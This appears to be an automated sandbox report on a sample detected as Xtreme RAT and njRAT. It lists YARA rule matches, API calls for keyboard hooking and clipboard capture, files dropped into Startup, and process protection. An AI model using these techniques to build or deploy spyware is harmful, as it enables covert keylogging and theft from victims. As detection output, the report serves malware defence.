Source: 19.2.System.exe.3e0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 20.2.System.exe.240000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 20.0.System.exe.240000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_10008568 SetWindowsHookExW 0000000D,10008040,00000000,00000000

0_2_10008568

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_10008040 GetKeyboardState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,VirtualAlloc,SendMessageA,CallNextHookEx,

0_2_10008040

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_100069DC OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard,

0_2_100069DC

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_100069DC OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard,

0_2_100069DC

Source: 7FW4ce2RDy.exe, 00000000.00000002.296286620.000000000076A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_10006D04 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

0_2_10006D04

E-Banking Fraud:

Yara detected Njrat

Show sources

Source: Yara match	File source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7FW4ce2RDy.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 562Server.exe PID: 4472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 5712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6872, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED

Operating System Destruction:

Protects its processes via BreakOnTermination flag

Show sources

Source: C:\Users\user\AppData\Local\Temp\System.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary:

Yara detected Xtreme RAT

Show sources

Source: Yara match	File source: 7FW4ce2RDy.exe, type: SAMPLE
Source: Yara match	File source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY

Malicious sample detected (through community Yara rule)

Show sources

Source: 7FW4ce2RDy.exe, type: SAMPLE	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7FW4ce2RDy.exe, type: SAMPLE	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 7FW4ce2RDy.exe, type: SAMPLE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000000.00000000.291223895.0000000010056000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000001.00000002.304153426.0000000010048000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000000.293164908.0000000010048000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Xtreme RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000000.00000000.291215045.0000000010048000.00000080.00020000.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED	Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter

Installs Xtreme RAT

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Key created: HKEY_CURRENT_USER\SOFTWARE\XtremeRAT

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 564

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10048CE7	0_2_10048CE7
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10048E4D	0_2_10048E4D
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_100486C1	0_2_100486C1
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10048F11	0_2_10048F11

Source: 7FW4ce2RDy.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7FW4ce2RDy.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7FW4ce2RDy.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7FW4ce2RDy.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 7FW4ce2RDy.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: 7FW4ce2RDy.exe, type: SAMPLE	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 7FW4ce2RDy.exe, type: SAMPLE	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7FW4ce2RDy.exe, type: SAMPLE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
